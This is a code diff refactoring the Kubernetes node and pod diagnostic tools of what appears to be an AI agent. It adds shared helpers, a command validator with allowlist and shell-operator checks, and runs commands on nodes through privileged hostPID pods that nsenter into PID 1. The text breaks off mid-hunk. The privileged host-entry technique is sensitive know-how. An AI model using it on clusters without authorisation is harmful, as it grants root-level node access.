+      stderr: err.stderr?.trim() ?? err.message,
+      exitCode: typeof err.code === "number" ? err.code : null,
+    };
+  }
+}
+
+// ── Container netns resolution ───────────────────────────────────────
+
+/**
+ * Resolve the network namespace of a container inside a pod.
+ * Returns the node name and container ID needed to construct nsenter commands.
+ *
+ * Steps:
+ *   1. Verify pod is Running, get its node name
+ *   2. Verify node is Ready
+ *   3. Get container ID, strip runtime prefix
+ */
+export async function resolveContainerNetns(
+  pod: string,
+  namespace: string,
+  container: string | undefined,
+  env: ExecEnv,
+): Promise<{ nodeName: string; containerID: string } | { error: string }> {
+  // Step 1: Get pod phase + node
+  let nodeName: string;
+  try {
+    const result = await spawnAsync(
+      "kubectl",
+      [
+        ...env.kubeconfigArgs,
+        "get", "pod", pod, "-n", namespace,
+        "-o", "jsonpath={.status.phase},{.spec.nodeName}",
+      ],
+      10_000,
+      env.childEnv,
+    );
+    const parts = result.stdout.trim().split(",");
+    const phase = parts[0];
+    nodeName = parts[1] || "";
+    if (phase !== "Running") {
+      return {
+        error: `Pod "${pod}" in namespace "${namespace}" is not Running (phase: ${phase || "unknown"}). Cannot enter its network namespace.`,
+      };
+    }
+    if (!nodeName) {
+      return {
+        error: `Could not determine node for pod "${pod}" in namespace "${namespace}".`,
+      };
+    }
+  } catch (err: any) {
+    const stderr = (err.stderr?.trim() || err.message) as string;
+    if (stderr.includes("not found")) {
+      return {
+        error: `Pod "${pod}" not found in namespace "${namespace}". Check the pod name and namespace.`,
+      };
+    }
+    return { error: `Failed to get pod info: ${stderr}` };
+  }
+
+  // Step 2: Check node is Ready
+  const nodeCheckErr = await checkNodeReady(
+    nodeName, env.childEnv, env.kubeconfigPath ?? undefined,
+  );
+  if (nodeCheckErr) {
+    return { error: nodeCheckErr };
+  }
+
+  // Step 3: Get container ID
+  try {
+    const jsonpathExpr = container?.trim()
+      ? `{.status.containerStatuses[?(@.name=="${container.trim()}")].containerID}`
+      : "{.status.containerStatuses[0].containerID}";
+    const result = await spawnAsync(
+      "kubectl",
+      [
+        ...env.kubeconfigArgs,
+        "get", "pod", pod, "-n", namespace,
+        "-o", `jsonpath=${jsonpathExpr}`,
+      ],
+      10_000,
+      env.childEnv,
+    );
+    let containerID = result.stdout.trim();
+    if (!containerID) {
+      return {
+        error: `Could not determine container ID for pod "${pod}". Is the pod running?`,
+      };
+    }
+    // Strip the runtime prefix (e.g. "containerd://")
+    const prefixIdx = containerID.indexOf("://");
+    if (prefixIdx !== -1) {
+      containerID = containerID.slice(prefixIdx + 3);
+    }
+    return { nodeName, containerID };
+  } catch (err: any) {
+    return {
+      error: `Failed to get container ID: ${err.stderr?.trim() || err.message}`,
+    };
+  }
+}

--- a/src/tools/netns-script.ts
+++ b/src/tools/netns-script.ts
@@ -1,70 +1,20 @@
 import { Type } from "@sinclair/typebox";
-import { spawn } from "node:child_process";
-import { randomBytes } from "node:crypto";
 import type { ToolDefinition } from "@mariozechner/pi-coding-agent";
 import { Text } from "@mariozechner/pi-tui";
 import type { KubeconfigRef } from "../core/agent-factory.js";
 import { resolveScript } from "./script-resolver.js";
-import { processToolOutput, renderTextResult } from "./tool-render.js";
-import { checkNodeReady } from "./k8s-checks.js";
+import { renderTextResult } from "./tool-render.js";
 import { loadConfig } from "../core/config.js";
-import { sanitizeEnv } from "./sanitize-env.js";
 import { parseArgs, shellEscape } from "./command-sets.js";
+import {
+  validatePodName,
+  prepareExecEnv,
+  resolveContainerNetns,
+  runInDebugPod,
+  formatExecOutput,
+} from "./exec-utils.js";
 
 const DEFAULT_IMAGE = loadConfig().debugImage;
-
-// Valid pod name: RFC 1123 subdomain
-const POD_NAME_RE = /^[a-z0-9][a-z0-9.\-]*$/;
-
-function spawnAsync(
-  cmd: string,
-  args: string[],
-  timeout: number,
-  env?: NodeJS.ProcessEnv,
-  signal?: AbortSignal,
-): Promise<{ stdout: string; stderr: string }> {
-  return new Promise((resolve, reject) => {
-    let stdout = "";
-    let stderr = "";
-    const child = spawn(cmd, args, {
-      stdio: ["ignore", "pipe", "pipe"],
-      env,
-    });
-    const onAbort = () => child.kill("SIGKILL");
-    signal?.addEventListener("abort", onAbort, { once: true });
-    child.stdout.on("data", (chunk: Buffer) => {
-      stdout += chunk.toString();
-    });
-    child.stderr.on("data", (chunk: Buffer) => {
-      stderr += chunk.toString();
-    });
-    const timer = setTimeout(() => {
-      child.kill("SIGKILL");
-    }, timeout);
-    child.on("close", (code) => {
-      clearTimeout(timer);
-      signal?.removeEventListener("abort", onAbort);
-      if (code === 0) resolve({ stdout, stderr });
-      else
-        reject(
-          Object.assign(new Error(`exit ${code}`), { code, stdout, stderr }),
-        );
-    });
-    child.on("error", (err) => {
-      clearTimeout(timer);
-      signal?.removeEventListener("abort", onAbort);
-      reject(err);
-    });
-  });
-}
-
-function filterPodNoise(stderr: string): string {
-  return stderr
-    .split("\n")
-    .filter((line) => !line.match(/^pod "node-debug-.*" deleted$/))
-    .join("\n")
-    .trim();
-}
 
 interface NetnsScriptParams {
   pod: string;
@@ -154,22 +104,18 @@ Examples:
     }),
     async execute(_toolCallId, rawParams, signal) {
       const params = rawParams as NetnsScriptParams;
-      const env = {
-        ...sanitizeEnv(process.env as Record<string, string>),
-        ...(kubeconfigRef?.credentialsDir ? { SICLAW_CREDENTIALS_DIR: kubeconfigRef.credentialsDir } : {}),
-        KUBECONFIG: "/dev/null",
-      };
+      const env = prepareExecEnv(kubeconfigRef);
       const pod = params.pod?.trim();
       const namespace = params.namespace?.trim() || "default";
 
-      if (!pod || !POD_NAME_RE.test(pod)) {
+      // Validate pod name
+      const podErr = validatePodName(pod);
+      if (podErr) {
         return {
-          content: [
-            {
-              type: "text",
-              text: `Error: invalid pod name "${pod}". Pod names may only contain lowercase letters, digits, hyphens, and dots.`,
-            },
-          ],
+          content: [{
+            type: "text",
+            text: `Error: ${podErr}`,
+          }],
           details: { error: true },
         };
       }
@@ -186,127 +132,20 @@ Examples:
         };
       }
 
+      // Resolve container network namespace
+      const netns = await resolveContainerNetns(pod, namespace, params.container, env);
+      if ("error" in netns) {
+        return {
+          content: [{ type: "text", text: `Error: ${netns.error}` }],
+          details: { error: true },
+        };
+      }
+
       const image = params.image || DEFAULT_IMAGE;
       const timeout = Math.min(params.timeout_seconds ?? 180, 300) * 1000;
       const args = params.args?.trim() || "";
 
-      // Step 1: Get pod phase + node in one call
-      let nodeName: string;
-      try {
-        const result = await spawnAsync(
-          "kubectl",
-          [
-            "get",
-            "pod",
-            pod,
-            "-n",
-            namespace,
-            "-o",
-            "jsonpath={.status.phase},{.spec.nodeName}",
-          ],
-          10_000,
-          env,
-        );
-        const parts = result.stdout.trim().split(",");
-        const phase = parts[0];
-        nodeName = parts[1] || "";
-        if (phase !== "Running") {
-          return {
-            content: [
-              {
-                type: "text",
-                text: `Error: Pod "${pod}" in namespace "${namespace}" is not Running (phase: ${phase || "unknown"}). Cannot enter its network namespace.`,
-              },
-            ],
-            details: { error: true },
-          };
-        }
-        if (!nodeName) {
-          return {
-            content: [
-              {
-                type: "text",
-                text: `Error: could not determine node for pod "${pod}" in namespace "${namespace}".`,
-              },
-            ],
-            details: { error: true },
-          };
-        }
-      } catch (err: any) {
-        const stderr = (err.stderr?.trim() || err.message) as string;
-        if (stderr.includes("not found")) {
-          return {
-            content: [
-              {
-                type: "text",
-                text: `Error: Pod "${pod}" not found in namespace "${namespace}". Check the pod name and namespace.`,
-              },
-            ],
-            details: { error: true },
-          };
-        }
-        return {
-          content: [
-            {
-              type: "text",
-              text: `Error: failed to get pod info: ${stderr}`,
-            },
-          ],
-          details: { error: true },
-        };
-      }
-
-      // Check node is Ready before creating debug pod
-      const nodeCheckErr = await checkNodeReady(nodeName, env);
-      if (nodeCheckErr) {
-        return {
-          content: [{ type: "text", text: `Error: ${nodeCheckErr}` }],
-          details: { error: true },
-        };
-      }
-
-      // Step 2: Get the container ID
-      let containerID: string;
-      try {
-        const jsonpathExpr = params.container?.trim()
-          ? `{.status.containerStatuses[?(@.name=="${params.container.trim()}")].containerID}`
-          : "{.status.containerStatuses[0].containerID}";
-        const result = await spawnAsync(
-          "kubectl",
-          ["get", "pod", pod, "-n", namespace, "-o", `jsonpath=${jsonpathExpr}`],
-          10_000,
-          env,
-        );
-        containerID = result.stdout.trim();
-        if (!containerID) {
-          return {
-            content: [
-              {
-                type: "text",
-                text: `Error: could not determine container ID for pod "${pod}". Is the pod running?`,
-              },
-            ],
-            details: { error: true },
-          };
-        }
-        // Strip the runtime prefix (e.g. "containerd://")
-        const prefixIdx = containerID.indexOf("://");
-        if (prefixIdx !== -1) {
-          containerID = containerID.slice(prefixIdx + 3);
-        }
-      } catch (err: any) {
-        return {
-          content: [
-            {
-              type: "text",
-              text: `Error: failed to get container ID: ${err.stderr?.trim() || err.message}`,
-            },
-          ],
-          details: { error: true },
-        };
-      }
-
-      // Step 3: Build debug pod with double nsenter
+      // Base64 encode script content
       const b64 = Buffer.from(resolved.content).toString("base64");
       const ext = resolved.interpreter === "python3" ? ".py" : ".sh";
       // Security: shell-escape each argument to prevent injection via args parameter
@@ -317,7 +156,7 @@ Examples:
       // Uses unshare --mount + sysfs remount so that /sys reflects the pod's
       // network namespace (sysfs is mount-namespace-dependent, not netns-dependent).
       const innerScript = `
-CONTAINER_ID="${containerID}"
+CONTAINER_ID="${netns.containerID}"
 PID=$(crictl inspect "$CONTAINER_ID" 2>/dev/null | jq -r ".info.pid")
 if [ -z "$PID" ] || [ "$PID" = "null" ]; then
   echo "Error: cannot find PID for container $CONTAINER_ID" >&2
@@ -327,157 +166,25 @@ echo '${b64}' | base64 -d > /tmp/_s${ext}
 unshare --mount nsenter -t "$PID" -n -- sh -c 'mount -t sysfs none /sys 2>/dev/null; ${resolved.interpreter} /tmp/_s${ext}${scriptArgs}'
 `.trim();
 
-      const podId = randomBytes(4).toString("hex");
-      const podName = `node-debug-${podId}`;
+      const nsenterCmd = [
+        "nsenter", "-t", "1", "-m", "-u", "-i", "-n", "-p",
+        "--", "sh", "-c", innerScript,
+      ];
 
-      const cleanup = () => {
-        spawnAsync(
-          "kubectl",
-          ["delete", "pod", podName, "--force", "--grace-period=0"],
-          10_000,
-          env,
-        ).catch(() => {});
-      };
+      const execResult = await runInDebugPod(
+        { nodeName: netns.nodeName, command: nsenterCmd, image },
+        env,
+        { timeoutMs: timeout, signal },
+      );
 
-      const overrides = JSON.stringify({
-        spec: {
-          nodeName: nodeName,
-          hostPID: true,
-          hostNetwork: true,
-          containers: [
-            {
-              name: podName,
-              image,
-              securityContext: { privileged: true },
-              command: [
-                "nsenter",
-                "-t",
-                "1",
-                "-m",
-                "-u",
-                "-i",
-                "-n",
-                "-p",
-                "--",
-                "sh",
-                "-c",
-                innerScript,
-              ],
-            },
-          ],
-          restartPolicy: "Never",
-        },
-      });
-
-      try {
-        // Phase 1: Create pod
-        await spawnAsync(
-          "kubectl",
-          [
-            "run",
-            podName,
-            "--restart=Never",
-            `--image=${image}`,
-            `--overrides=${overrides}`,
-          ],
-          30_000,
-          env,
-          signal,
-        );
-
-        // Phase 2: Wait for pod to complete
-        const waitTimeout = Math.ceil(timeout / 1000);
-        try {
-          await spawnAsync(
-            "kubectl",
-            [
-              "wait",
-              `--for=jsonpath={.status.phase}=Succeeded`,
-              `pod/${podName}`,
-              `--timeout=${waitTimeout}s`,
-            ],
-            timeout + 5_000,
-            env,
-            signal,
-          );
-        } catch {
-          // Pod may have failed — still fetch logs
-        }
-
-        if (signal?.aborted) {
-          cleanup();
-          return {
-            content: [{ type: "text", text: "Aborted." }],
-            details: { error: true },
-          };
-        }
-
-        // Phase 3: Fetch logs
-        let stdout = "";
-        let stderr = "";
-        try {
-          const logsResult = await spawnAsync(
-            "kubectl",
-            ["logs", podName],
-            10_000,
-            env,
-          );
-          stdout = logsResult.stdout;
-          stderr = logsResult.stderr;
-        } catch (logErr: any) {
-          stdout = logErr.stdout ?? "";
-          stderr = logErr.stderr ?? "";
-        }
-
-        // Phase 4: Get exit code
-        let exitCode: number | null = null;
-        try {
-          const statusResult = await spawnAsync(
-            "kubectl",
-            [
-              "get",
-              "pod",
-              podName,
-              "-o",
-              "jsonpath={.status.containerStatuses[0].state.terminated.exitCode}",
-            ],
-            5_000,
-            env,
-          );
-          const code = parseInt(statusResult.stdout.trim(), 10);
-          if (!isNaN(code)) exitCode = code;
-        } catch {
-          // ignore
-        }
-
-        // Phase 5: Cleanup
-        cleanup();
-
-        const filteredStderr = filterPodNoise(stderr);
-        const output =
-          stdout.trim() +
-          (filteredStderr ? `\n\nSTDERR:\n${filteredStderr}` : "");
-
-        if (exitCode === 0 || (exitCode === null && stdout.trim())) {
-          return {
-            content: [{ type: "text", text: processToolOutput(output) }],
-            details: { exitCode: exitCode ?? 0 },
-          };
-        } else {
-          const errOutput = `Exit code: ${exitCode ?? "unknown"}\n${output}`;
-          return {
-            content: [{ type: "text", text: processToolOutput(errOutput) }],
-            details: { exitCode, error: true },
-          };
-        }
-      } catch (err: any) {
-        cleanup();
-        const output = `Exit code: ${err.code ?? "unknown"}\n${err.stdout?.trim() ?? ""}\n${err.stderr?.trim() ?? err.message}`;
+      if (signal?.aborted) {
         return {
-          content: [{ type: "text", text: processToolOutput(output) }],
-          details: { exitCode: err.code, error: true },
+          content: [{ type: "text", text: "Aborted." }],
+          details: { error: true },
         };
       }
+
+      return formatExecOutput(execResult);
     },
   };
 }

--- a/src/tools/node-exec.ts
+++ b/src/tools/node-exec.ts
@@ -1,141 +1,25 @@
 import { Type } from "@sinclair/typebox";
-import { spawn } from "node:child_process";
-import { randomBytes } from "node:crypto";
 import { Text } from "@mariozechner/pi-tui";
 import type { ToolDefinition } from "@mariozechner/pi-coding-agent";
 import type { KubeconfigRef } from "../core/agent-factory.js";
-import { renderTextResult, processToolOutput } from "./tool-render.js";
-import { checkNodeReady, waitForPodDone } from "./k8s-checks.js";
-import { resolveKubeconfigPath } from "./kubeconfig-resolver.js";
-import { sanitizeEnv } from "./sanitize-env.js";
+import { renderTextResult } from "./tool-render.js";
+import { checkNodeReady } from "./k8s-checks.js";
 import { loadConfig } from "../core/config.js";
+import { parseArgs } from "./command-sets.js";
+import { validateCommand, extractCommands } from "./command-validator.js";
 import {
-  ALLOWED_COMMANDS,
-  parseArgs,
-  getCommandBinary,
-  validateCommandRestrictions,
-} from "./command-sets.js";
-import { validateShellOperators, extractCommands } from "./restricted-bash.js";
-
-function spawnAsync(
-  cmd: string,
-  args: string[],
-  timeout: number,
-  env?: NodeJS.ProcessEnv,
-  signal?: AbortSignal,
-): Promise<{ stdout: string; stderr: string }> {
-  return new Promise((resolve, reject) => {
-    let stdout = "";
-    let stderr = "";
-    const child = spawn(cmd, args, {
-      stdio: ["ignore", "pipe", "pipe"],
-      env,
-    });
-    const onAbort = () => child.kill("SIGKILL");
-    signal?.addEventListener("abort", onAbort, { once: true });
-    child.stdout.on("data", (chunk: Buffer) => {
-      stdout += chunk.toString();
-    });
-    child.stderr.on("data", (chunk: Buffer) => {
-      stderr += chunk.toString();
-    });
-    const timer = setTimeout(() => {
-      child.kill("SIGKILL");
-    }, timeout);
-    child.on("close", (code) => {
-      clearTimeout(timer);
-      signal?.removeEventListener("abort", onAbort);
-      if (code === 0) resolve({ stdout, stderr });
-      else
-        reject(
-          Object.assign(new Error(`exit ${code}`), { code, stdout, stderr })
-        );
-    });
-    child.on("error", (err) => {
-      clearTimeout(timer);
-      signal?.removeEventListener("abort", onAbort);
-      reject(err);
-    });
-  });
-}
+  validateNodeName,
+  prepareExecEnv,
+  runInDebugPod,
+  formatExecOutput,
+} from "./exec-utils.js";
 
 const DEFAULT_IMAGE = loadConfig().debugImage;
 
-// Re-export shared ALLOWED_COMMANDS for backward compatibility
+// Re-export for backward compatibility (tests + downstream imports)
 export { ALLOWED_COMMANDS } from "./command-sets.js";
-
-// Valid node name: alphanumeric, hyphens, dots only
-const NODE_NAME_RE = /^[a-zA-Z0-9][a-zA-Z0-9.\-]*$/;
-
-/**
- * Validate a Kubernetes node name.
- * Returns an error message if invalid, or null if valid.
- */
-export function validateNodeName(node: string): string | null {
-  if (!node || !node.trim()) {
-    return "Node name must not be empty.";
-  }
-  if (!NODE_NAME_RE.test(node)) {
-    return `Invalid node name "${node}". Node names may only contain letters, digits, hyphens, and dots.`;
-  }
-  return null;
-}
-
-/**
- * Validate a command intended for node-exec.
- * Uses the same validation pipeline as restricted-bash:
- * 1. validateShellOperators — blocks dangerous shell constructs
- * 2. extractCommands — splits pipelines
- * 3. Per-command: whitelist check + validateCommandRestrictions
- * Returns an error message if blocked, or null if allowed.
- */
-export function validateCommand(command: string): string | null {
-  if (!command || !command.trim()) {
-    return "Command must not be empty.";
-  }
-
-  // Block dangerous shell operators ($(), backticks, redirections, process substitution)
-  const shellOpErr = validateShellOperators(command);
-  if (shellOpErr) return shellOpErr;
-
-  // Split pipelines (|, &&, ;, ||) and validate each sub-command
-  const commands = extractCommands(command);
-  if (commands.length === 0) {
-    return "Command must not be empty.";
-  }
-
-  for (const cmd of commands) {
-    const baseName = getCommandBinary(cmd);
-    if (!baseName) continue;
-
-    if (!ALLOWED_COMMANDS.has(baseName)) {
-      return JSON.stringify(
-        {
-          error: `Command "${baseName}" is not in the allowed command list.`,
-          allowed_categories: {
-            network: "ip, ifconfig, ping, traceroute, tracepath, ss, netstat, route, arp, ethtool, mtr, bridge, tc, conntrack, nslookup, dig, host, curl",
-            rdma: "ibstat, ibstatus, ibv_devinfo, ibv_devices, rdma, ibaddr, iblinkinfo, ibportstate, ibswitches, ibroute, show_gids, ibdev2netdev",
-            perftest: "ib_write_bw, ib_write_lat, ib_read_bw, ib_read_lat, ib_send_bw, ib_send_lat, ib_atomic_bw, ib_atomic_lat, raw_ethernet_bw, raw_ethernet_lat, raw_ethernet_burst_lat",
-            gpu: "nvidia-smi, gpustat, nvtopo",
-            hardware: "lspci, lsusb, lsblk, lscpu, lsmem, lshw, dmidecode",
-            kernel: "uname, hostname, uptime, dmesg, sysctl, lsmod, modinfo",
-            process: "ps, pgrep, top, free, vmstat, iostat, mpstat, df, du, mount, findmnt, nproc",
-            file: "cat, ls, pwd, stat, file, find, readlink, realpath, basename, dirname, diff, md5sum, sha256sum",
-            general: "date, whoami, id, env, printenv, which",
-          },
-        },
-        null,
-        2
-      );
-    }
-
-    // Apply unified command-level restrictions (find -exec, sysctl -w, curl -o, etc.)
-    const restrictionErr = validateCommandRestrictions(cmd);
-    if (restrictionErr) return restrictionErr;
-  }
-
-  return null;
-}
+export { validateNodeName, validatePodName } from "./exec-utils.js";
+export { validateCommand } from "./command-validator.js";
 
 interface NodeExecParams {
   node: string;
@@ -228,13 +112,7 @@ Examples:
     renderResult: renderTextResult,
     async execute(_toolCallId, rawParams, signal) {
       const params = rawParams as NodeExecParams;
-      const kubeconfigPath = resolveKubeconfigPath(kubeconfigRef?.credentialsDir);
-      const kubeconfigArgs = kubeconfigPath ? [`--kubeconfig=${kubeconfigPath}`] : [];
-      const childEnv = {
-        ...sanitizeEnv(process.env as Record<string, string>),
-        ...(kubeconfigRef?.credentialsDir ? { SICLAW_CREDENTIALS_DIR: kubeconfigRef.credentialsDir } : {}),
-        KUBECONFIG: "/dev/null",
-      };
+      const env = prepareExecEnv(kubeconfigRef);
 
       // Validate node name
       const nodeErr = validateNodeName(params.node);
@@ -246,7 +124,7 @@ Examples:
       }
 
       // Validate command
-      const cmdErr = validateCommand(params.command);
+      const cmdErr = validateCommand(params.command, { context: "node" });
       if (cmdErr) {
         return {
           content: [{ type: "text", text: cmdErr }],
@@ -254,8 +132,10 @@ Examples:
         };
       }
 
-      // Check node exists and is Ready (after all local validation passes)
-      const nodeCheckErr = await checkNodeReady(params.node, childEnv, kubeconfigPath ?? undefined);
+      // Check node exists and is Ready
+      const nodeCheckErr = await checkNodeReady(
+        params.node, env.childEnv, env.kubeconfigPath ?? undefined,
+      );
       if (nodeCheckErr) {
         return {
           content: [{ type: "text", text: JSON.stringify({ error: nodeCheckErr }, null, 2) }],
@@ -269,126 +149,25 @@ Examples:
       const needsShell = commands.length > 1;
       const cmdArgs = parseArgs(params.command);
 
-      // Generate a unique pod name
-      const podId = randomBytes(4).toString("hex");
-      const podName = `node-debug-${podId}`;
-
-      const cleanup = () => {
-        spawnAsync("kubectl", [
-          ...kubeconfigArgs, "delete", "pod", podName, "--force", "--grace-period=0",
-        ], 10_000, childEnv).catch(() => {});
-      };
-
-      // Build overrides: privileged + hostPID + hostNetwork + nsenter
-      // Single command: pass args directly (no shell overhead)
-      // Pipeline: wrap in sh -c for shell interpretation
+      // Build nsenter command
       const nsenterCmd = needsShell
         ? ["nsenter", "-t", "1", "-m", "-u", "-i", "-n", "-p", "--", "sh", "-c", params.command]
         : ["nsenter", "-t", "1", "-m", "-u", "-i", "-n", "-p", "--", ...cmdArgs];
-      const overrides = JSON.stringify({
-        spec: {
-          nodeName: params.node,
-          hostPID: true,
-          hostNetwork: true,
-          containers: [{
-            name: podName,
-            image,
-            securityContext: { privileged: true },
-            command: nsenterCmd,
-          }],
-        },
-      });
 
-      try {
-        // Phase 1: Create pod
-        await spawnAsync("kubectl", [
-          ...kubeconfigArgs,
-          "run", podName,
-          "--restart=Never",
-          `--image=${image}`,
-          `--overrides=${overrides}`,
-        ], 30_000, childEnv, signal);
+      const execResult = await runInDebugPod(
+        { nodeName: params.node, command: nsenterCmd, image },
+        env,
+        { timeoutMs: timeout, signal },
+      );
 
-        // Phase 2: Wait for pod to reach terminal phase (Succeeded or Failed)
-        try {
-          await waitForPodDone(podName, timeout, childEnv, signal, kubeconfigPath ?? undefined);
-        } catch {
-          // Timed out — still fetch logs before cleanup
-        }
-
-        if (signal?.aborted) {
-          cleanup();
-          return {
-            content: [{ type: "text", text: "Aborted." }],
-            details: { error: true },
-          };
-        }
-
-        // Phase 3: Fetch logs
-        let stdout = "";
-        let stderr = "";
-        try {
-          const logsResult = await spawnAsync("kubectl", [
-            ...kubeconfigArgs, "logs", podName,
-          ], 10_000, childEnv);
-          stdout = logsResult.stdout;
-          stderr = logsResult.stderr;
-        } catch (logErr: any) {
-          stdout = logErr.stdout ?? "";
-          stderr = logErr.stderr ?? "";
-        }
-
-        // Phase 4: Get exit code from pod status
-        let exitCode: number | null = null;
-        try {
-          const statusResult = await spawnAsync("kubectl", [
-            ...kubeconfigArgs, "get", "pod", podName,
-            "-o", "jsonpath={.status.containerStatuses[0].state.terminated.exitCode}",
-          ], 5_000, childEnv);
-          const code = parseInt(statusResult.stdout.trim(), 10);
-          if (!isNaN(code)) exitCode = code;
-        } catch {
-          // ignore — exitCode stays null
-        }
-
-        // Phase 5: Cleanup
-        cleanup();
-
-        const filteredStderr = filterPodNoise(stderr);
-        const output = stdout.trim() + (filteredStderr ? `\n\nSTDERR:\n${filteredStderr}` : "");
-
-        if (exitCode === 0 || (exitCode === null && stdout.trim())) {
-          return {
-            content: [{ type: "text", text: processToolOutput(output) }],
-            details: { exitCode: exitCode ?? 0 },
-          };
-        } else {
-          const errOutput = `Exit code: ${exitCode ?? "unknown"}\n${output}`;
-          return {
-            content: [{ type: "text", text: processToolOutput(errOutput) }],
-            details: { exitCode, error: true },
-          };
-        }
-      } catch (err: any) {
-        cleanup();
-        const output = `Exit code: ${err.code ?? "unknown"}\n${err.stdout?.trim() ?? ""}\n${err.stderr?.trim() ?? err.message}`;
+      if (signal?.aborted) {
         return {
-          content: [{ type: "text", text: processToolOutput(output) }],
-          details: { exitCode: err.code, error: true },
+          content: [{ type: "text", text: "Aborted." }],
+          details: { error: true },
         };
       }
+
+      return formatExecOutput(execResult);
     },
   };
-}
-
-/**
- * Filter out kubectl run informational lines from stderr
- * (e.g. 'pod "node-debug-xxx" deleted').
- */
-function filterPodNoise(stderr: string): string {
-  return stderr
-    .split("\n")
-    .filter((line) => !line.match(/^pod "node-debug-.*" deleted$/))
-    .join("\n")
-    .trim();
 }

--- a/src/tools/node-script.ts
+++ b/src/tools/node-script.ts
@@ -1,69 +1,20 @@
 import { Type } from "@sinclair/typebox";
-import { spawn } from "node:child_process";
-import { randomBytes } from "node:crypto";
 import type { ToolDefinition } from "@mariozechner/pi-coding-agent";
 import { Text } from "@mariozechner/pi-tui";
 import type { KubeconfigRef } from "../core/agent-factory.js";
-import { validateNodeName } from "./node-exec.js";
-import { checkNodeReady, waitForPodDone } from "./k8s-checks.js";
-import { resolveKubeconfigPath } from "./kubeconfig-resolver.js";
-import { sanitizeEnv } from "./sanitize-env.js";
+import { checkNodeReady } from "./k8s-checks.js";
 import { resolveScript } from "./script-resolver.js";
-import { processToolOutput, renderTextResult } from "./tool-render.js";
+import { renderTextResult } from "./tool-render.js";
 import { loadConfig } from "../core/config.js";
 import { parseArgs, shellEscape } from "./command-sets.js";
+import {
+  validateNodeName,
+  prepareExecEnv,
+  runInDebugPod,
+  formatExecOutput,
+} from "./exec-utils.js";
 
 const DEFAULT_IMAGE = loadConfig().debugImage;
-
-function spawnAsync(
-  cmd: string,
-  args: string[],
-  timeout: number,
-  env?: NodeJS.ProcessEnv,
-  signal?: AbortSignal,
-): Promise<{ stdout: string; stderr: string }> {
-  return new Promise((resolve, reject) => {
-    let stdout = "";
-    let stderr = "";
-    const child = spawn(cmd, args, {
-      stdio: ["ignore", "pipe", "pipe"],
-      env,
-    });
-    const onAbort = () => child.kill("SIGKILL");
-    signal?.addEventListener("abort", onAbort, { once: true });
-    child.stdout.on("data", (chunk: Buffer) => {
-      stdout += chunk.toString();
-    });
-    child.stderr.on("data", (chunk: Buffer) => {
-      stderr += chunk.toString();
-    });
-    const timer = setTimeout(() => {
-      child.kill("SIGKILL");
-    }, timeout);
-    child.on("close", (code) => {
-      clearTimeout(timer);
-      signal?.removeEventListener("abort", onAbort);
-      if (code === 0) resolve({ stdout, stderr });
-      else
-        reject(
-          Object.assign(new Error(`exit ${code}`), { code, stdout, stderr }),
-        );
-    });
-    child.on("error", (err) => {
-      clearTimeout(timer);
-      signal?.removeEventListener("abort", onAbort);
-      reject(err);
-    });
-  });
-}
-
-function filterPodNoise(stderr: string): string {
-  return stderr
-    .split("\n")
-    .filter((line) => !line.match(/^pod "node-debug-.*" deleted$/))
-    .join("\n")
-    .trim();
-}
 
 interface NodeScriptParams {
   node: string;
@@ -132,13 +83,7 @@ Examples:
     }),
     async execute(_toolCallId, rawParams, signal) {
       const params = rawParams as NodeScriptParams;
-      const kubeconfigPath = resolveKubeconfigPath(kubeconfigRef?.credentialsDir);
-      const kubeconfigArgs = kubeconfigPath ? [`--kubeconfig=${kubeconfigPath}`] : [];
-      const env = {
-        ...sanitizeEnv(process.env as Record<string, string>),
-        ...(kubeconfigRef?.credentialsDir ? { SICLAW_CREDENTIALS_DIR: kubeconfigRef.credentialsDir } : {}),
-        KUBECONFIG: "/dev/null",
-      };
+      const env = prepareExecEnv(kubeconfigRef);
 
       // Validate node name format
       const nodeErr = validateNodeName(params.node);
@@ -150,7 +95,9 @@ Examples:
       }
 
       // Check node exists and is Ready
-      const nodeCheckErr = await checkNodeReady(params.node, env, kubeconfigPath ?? undefined);
+      const nodeCheckErr = await checkNodeReady(
+        params.node, env.childEnv, env.kubeconfigPath ?? undefined,
+      );
       if (nodeCheckErr) {
         return {
           content: [{ type: "text", text: `Error: ${nodeCheckErr}` }],
@@ -185,147 +132,25 @@ Examples:
         ? `echo '${b64}' | base64 -d > /tmp/_s${ext} && ${resolved.interpreter} /tmp/_s${ext} ${escapedArgs}`
         : `echo '${b64}' | base64 -d > /tmp/_s${ext} && ${resolved.interpreter} /tmp/_s${ext}`;
 
-      const podId = randomBytes(4).toString("hex");
-      const podName = `node-debug-${podId}`;
+      const nsenterCmd = [
+        "nsenter", "-t", "1", "-m", "-u", "-i", "-n", "-p",
+        "--", "sh", "-c", innerCmd,
+      ];
 
-      const cleanup = () => {
-        spawnAsync(
-          "kubectl",
-          [...kubeconfigArgs, "delete", "pod", podName, "--force", "--grace-period=0"],
-          10_000,
-          env,
-        ).catch(() => {});
-      };
+      const execResult = await runInDebugPod(
+        { nodeName: params.node, command: nsenterCmd, image },
+        env,
+        { timeoutMs: timeout, signal },
+      );
 
-      const overrides = JSON.stringify({
-        spec: {
-          nodeName: params.node,
-          hostPID: true,
-          hostNetwork: true,
-          containers: [
-            {
-              name: podName,
-              image,
-              securityContext: { privileged: true },
-              command: [
-                "nsenter",
-                "-t",
-                "1",
-                "-m",
-                "-u",
-                "-i",
-                "-n",
-                "-p",
-                "--",
-                "sh",
-                "-c",
-                innerCmd,
-              ],
-            },
-          ],
-          restartPolicy: "Never",
-        },
-      });
-
-      try {
-        // Phase 1: Create pod
-        await spawnAsync(
-          "kubectl",
-          [
-            ...kubeconfigArgs,
-            "run",
-            podName,
-            "--restart=Never",
-            `--image=${image}`,
-            `--overrides=${overrides}`,
-          ],
-          30_000,
-          env,
-          signal,
-        );
-
-        // Phase 2: Wait for pod to reach terminal phase (Succeeded or Failed)
-        try {
-          await waitForPodDone(podName, timeout, env, signal, kubeconfigPath ?? undefined);
-        } catch {
-          // Timed out — still fetch logs before cleanup
-        }
-
-        if (signal?.aborted) {
-          cleanup();
-          return {
-            content: [{ type: "text", text: "Aborted." }],
-            details: { error: true },
-          };
-        }
-
-        // Phase 3: Fetch logs
-        let stdout = "";
-        let stderr = "";
-        try {
-          const logsResult = await spawnAsync(
-            "kubectl",
-            [...kubeconfigArgs, "logs", podName],
-            10_000,
-            env,
-          );
-          stdout = logsResult.stdout;
-          stderr = logsResult.stderr;
-        } catch (logErr: any) {
-          stdout = logErr.stdout ?? "";
-          stderr = logErr.stderr ?? "";
-        }
-
-        // Phase 4: Get exit code
-        let exitCode: number | null = null;
-        try {
-          const statusResult = await spawnAsync(
-            "kubectl",
-            [
-              ...kubeconfigArgs,
